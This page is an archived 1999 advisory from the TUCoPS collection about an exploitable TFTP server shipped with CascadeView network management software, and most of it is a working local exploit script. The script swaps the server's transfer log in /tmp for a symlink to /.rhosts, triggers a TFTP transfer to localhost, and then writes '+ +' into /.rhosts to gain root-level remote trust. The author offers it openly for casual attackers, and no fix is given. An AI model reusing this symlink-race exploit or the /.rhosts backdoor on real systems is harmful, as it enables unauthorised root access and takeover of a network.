TUCoPS :: Unix :: General :: cview-1.htm

CascadeView TFTP exploit 
Vulnerability

    CascadeView (tftp)

Affected

    CascadeView

Description

    Loneguard found following.   CascadeView is an network  management
    system  that  ships  with  an  exploitable  TFTP  server.  In case
    anyone misses the  significance of this,  you control the  NMS you
    control the network.   Here's a local  exploit to tied  the script
    kiddies over...

    #!/bin/sh
    #
    # tftpserv.sh - Loneguard 07/03/99
    #
    # Buggy tftp server shipped with CascadeView B-STDX 8000/9000
    #
    rm /tmp/tftpd_xfer_status.log
    ln -s /.rhosts /tmp/tftpd_xfer_status.log
    echo KungFu > crazymonkey
    ( sleep 1 ; echo put crazymonkey ; sleep 1 ; echo quit ) | tftp 127.1
    echo "+ +" > /.rhosts

Solution

    Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH